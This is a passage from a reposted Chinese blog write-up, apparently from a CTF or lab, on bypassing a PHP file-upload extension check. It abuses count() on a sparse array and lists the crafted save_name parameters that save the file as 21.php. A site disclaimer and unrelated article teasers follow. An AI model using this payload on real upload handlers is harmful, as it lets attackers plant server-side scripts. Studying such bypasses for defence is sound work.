因为count($file)返回数组中的元素数量,而不会考虑数组中未设置的元素

image-20240725102853403

然后一下这个东西

save_name[0]=21.php
save_name[1]=nothing
save_name[2]=png
因为如上面所说,所以count ($file)=2-1=1,返回数组1的值,但是有由于数组[1]设置的为空,所以就直接为21.php

执行成功

image-20240725102923298

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1974749.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

⾃定义类型:联合和枚举详解

本章讲述的是自定义类型中联合和枚举&#xff0c;在本章我们将会认识联合体&#xff0c;枚举的声明&#xff0c;使用&#xff0c;以及联体的大小&#xff0c;枚举类型的优点。 1.联合体 1.联合体类型的声明 像结构体⼀样&#xff0c;联合体也是由⼀个或者多个成员构成&#…

重新设计 Baklib 中的分析数据处理

数据库是任何应用程序性能最关键的部分之一。当谈到 Baklib 时&#xff0c;考虑到高度可扩展的 SaaS 环境&#xff0c;我们总是致力于提高应用程序的性能。 我们不断尝试提高应用程序的性能&#xff0c;在密切监视应用程序是否有任何挫折和改进的同时&#xff0c;我们发现每天…

推动未来的引擎:人工智能大模型的现状与发展

推动未来的引擎&#xff1a;人工智能大模型的现状与发展 一、引言 随着人工智能技术的迅速发展&#xff0c;人工智能大模型作为其中的重要组成部分&#xff0c;正逐渐成为推动科技进步的重要引擎。无论是在自然语言处理、计算机视觉&#xff0c;还是智能推荐等领域&#xff0…

快讯 | 苹果携手OpenAI,ChatGPT即将登陆iOS 18

在数字化浪潮的推动下&#xff0c;人工智能&#xff08;AI&#xff09;正成为塑造未来的关键力量。硅纪元视角栏目紧跟AI科技的最新发展&#xff0c;捕捉行业动态&#xff1b;提供深入的新闻解读&#xff0c;助您洞悉技术背后的逻辑&#xff1b;汇聚行业专家的见解&#xff0c;…

MATLAB预测模型(3)

一、前言 在MATLAB中&#xff0c;实现不同类型的预测模型&#xff0c;如马尔科夫预测、神经网络预测、模糊预测和灰色预测&#xff0c;需要用到不同的函数和工具箱。下面我将为每种预测模型提供一个基本的示例代码。 二、实现 1. 马尔科夫预测 马尔科夫预测通常用于处理具有无…

四大内存区域揭秘:你真的了解你的程序吗?

我是小米,一个喜欢分享技术的29岁程序员。如果你喜欢我的文章,欢迎关注我的微信公众号“软件求生”,获取更多技术干货! 大家好!我是你们的技术小伙伴小米,今天我们来聊聊操作系统中的进程空间。作为一名技术爱好者,我特别兴奋地为大家拆解一下进程空间的四大区域:栈区…

嵌入式实习--MobaXterm连接开发板与SSH远端服务器详细使用教程

提示&#xff1a;文章写完后&#xff0c;目录可以自动生成&#xff0c;如何生成可参考右边的帮助文档 文章目录 前言一、前期准备二、安装USB串口模块驱动1.1驱动未自动安装 二、MobaXterm安装使用2.1 MobaXterm 软件安装2.2 MobaXterm 软件使用2.2.1连接开发板2.2.2 远程SSH连…

图论-最小生成树

Prim算法 算法描述 dist[i]<-- for(i 0;i<n;i) t<--找到集合外最近的点 用t更新其他点到集合的距离&#xff08;这个集合就是已经确定的最小生成树的点和边&#xff09; st[t] true; dist[i] <-- 无穷 这一步是初始化所有节点到集合的最小距离为无穷大。dist[i] 表…

科普文:微服务之Spring Cloud 服务调用组件Openfeign

一、概述 Feign是声明式Web服务客户端&#xff0c;它使编写Web服务客户端更加容易。 Feign不做任何请求处理&#xff0c;通过处理注解相关信息生成Request&#xff0c;并对调用返回的数据进行解码&#xff0c;从而实现简化HTTP API的开发。 如果要使用Feign&#xff0c;需要创…

项目相关内容 ----- 2实现打印 ---- 图片与字符

目录 1 . 实现图图片的打印 1&#xff09;结构体定义 2&#xff09;画点线 3&#xff09;清屏 4&#xff09;图片显示 5&#xff09;主函数部分 2 . 实现字符的打印 1) 定义BMP位图文件的头部信息以及信息头​ 2&#xff09;实现打印字符的绘制​ 3 . 打印文本内容​ 附…

你会在Vision Pro里编程吗?

你会在Vision Pro里编程吗&#xff1f; Vision Pro作为一位开发者&#xff0c;你会考虑将Vision Pro应用到编程中吗&#xff1f;你认为Vision Pro有可能改变开发者的工作模式与效率吗&#xff1f; 初见Vision Pro有点陌生&#xff0c;不太了解Vision Pro是什么。那么这里先来了…

顶点着色器片段着色器

/* * FileName : OpenGL_Tutorial.cpp * Time : 2024-08-03 10:00:00 * Author : XuMing * Email : 920972751qq.com * description : 使用OpenGL进行顶点输入和着色器编译的详细解析 */#include <glad/glad.h> #include <GLFW/glfw3.…

【论文阅读visual grounding】QRNet论文解读与关键代码实现

Shifting More Attention to Visual Backbone: Query-modulated Refinement Networks for End-to-End Visual Grounding 论文链接&#xff1a;https://arxiv.org/abs/2203.15442 代码链接&#xff1a;https://github.com/z-w-wang/QRNet Motivation 视觉定位&#xff08;visua…

JavaScript基础——JavaScript变量声明

变量是存储数据的容器&#xff0c;可以变的量&#xff0c;值可以改变&#xff0c;在JavaScript中&#xff0c;变量声明的关键字有var、let&#xff0c;其中&#xff0c;var是ES5的语法&#xff0c;let是ES6的语法&#xff0c;变量需要先声明&#xff0c;在使用。 声明一个age变…

整除分块, CF538 F - A Heap of Heaps

一、题目 1、题目描述 2、输入输出 2.1输入 2.2输出 3、原题链接 F - A Heap of Heaps 二、解题报告 1、思路分析 给定v&#xff0c;k&#xff0c;v的父节点p (v - 2) / k 1 我们令P p - 1&#xff0c;V V - 2 P V / k&#xff0c;我们发现这就是一个整除分块问题…

Ubuntu22.04之有道词典mini窗口无法拖动问题(二百六十五)

简介&#xff1a; CSDN博客专家&#xff0c;专注Android/Linux系统&#xff0c;分享多mic语音方案、音视频、编解码等技术&#xff0c;与大家一起成长&#xff01; 新书发布&#xff1a;《Android系统多媒体进阶实战》&#x1f680; 优质专栏&#xff1a; Audio工程师进阶系列…

混合域注意力机制(空间+通道)

在计算机视觉任务中&#xff0c;空间域注意力通常关注图像中不同位置的重要性&#xff0c;例如突出图像中的关键对象或区域。而通道域注意力则侧重于不同通道&#xff08;特征图&#xff09;的重要性&#xff0c;决定哪些特征对于任务更具判别力。混合域注意力机制结合了空间域…

FIR低通滤波器

FIR低通滤波器 FIR(Finite Impulse Response)滤波器:有限长单位冲激响应滤波器,又称为非递归型滤波器,是数字信号处理系统中最基本的元件,它可以在保证任意幅频特性的同时具有严格的线性相频特性,同时其单位抽样响应是有限长的,因而滤波器是稳定的系统。 MATLAB实现…

详细了解架构师

架构师的核心职责是消除不确定性和降低复杂性&#xff01; 架构师画像 架构师的定位 架构设计环 澄清和技术相关的&#xff0c;比如支持百万级别的&#xff0c;架构师需要澄清&#xff0c;可能只有十万级。 架构师的三个核心能力 架构师的三个关键思维 架构设计流程和架构师…

初识MQ——学习MQ之前需要了解的知识点

目录 前言 1. 同步和异步通讯 1.1 同步通讯 1.2 异步通讯 2. MQ技术对比 前言 在现在的大数据时代&#xff0c;高并发的情况越来越普遍&#xff0c;系统一个不注意&#xff0c;就可能崩溃无法访问了。这是开发最不想看到的情况&#xff0c;如果是上班还好&#xff0c;可以…